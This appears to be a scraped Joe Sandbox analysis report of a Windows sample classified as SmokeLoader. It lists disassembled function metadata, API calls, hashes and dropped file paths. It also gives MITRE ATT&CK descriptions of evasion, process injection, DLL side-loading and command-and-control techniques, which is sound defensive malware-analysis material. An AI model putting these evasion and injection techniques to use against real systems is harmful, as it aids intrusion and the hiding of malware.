Opcode Fuzzy Hash: db8dc46efc40b99fabcfa4c7d1f5ac96ecf50084b678cb0d3d0fd53c861d6c22
Instruction Fuzzy Hash: 4321F731A84308EAD720DF94DC85BD97B70EF4C752F1181AAFA49AA1C0CAB45AC4CB59

Function 00415B10 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415B44
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B5F
HeapDestroy.KERNEL32(00000000), ref: 00415B7E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415B86

Memory Dump Source

Source File: 00000004.00000002.2418488030.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_ibjgueh.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: 2eaa3619de8731856ba23563b2baea9085cebb685e66d531b2d230375b233c37
Instruction ID: f8d66b9204655c3a429d25ec7d87b798a9bd44671bb4d674f784994b3474509b
Opcode Fuzzy Hash: 2eaa3619de8731856ba23563b2baea9085cebb685e66d531b2d230375b233c37
Instruction Fuzzy Hash: FF012670A82504DBE750EBB4EC85BDA7BA8F70C306F804037F60A97280DE346C54CB9A

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report mGFoU1INUk.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\B995.exe

C:\Users\user\AppData\Roaming\ibjgueh

C:\Users\user\AppData\Roaming\ibjgueh:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
mGFoU1INUk.exe

Function 00415BA0 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 283
filelibrarypipeCOMMON

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 02C4A58F Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 02FC003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 00415820 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Function 02FC0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON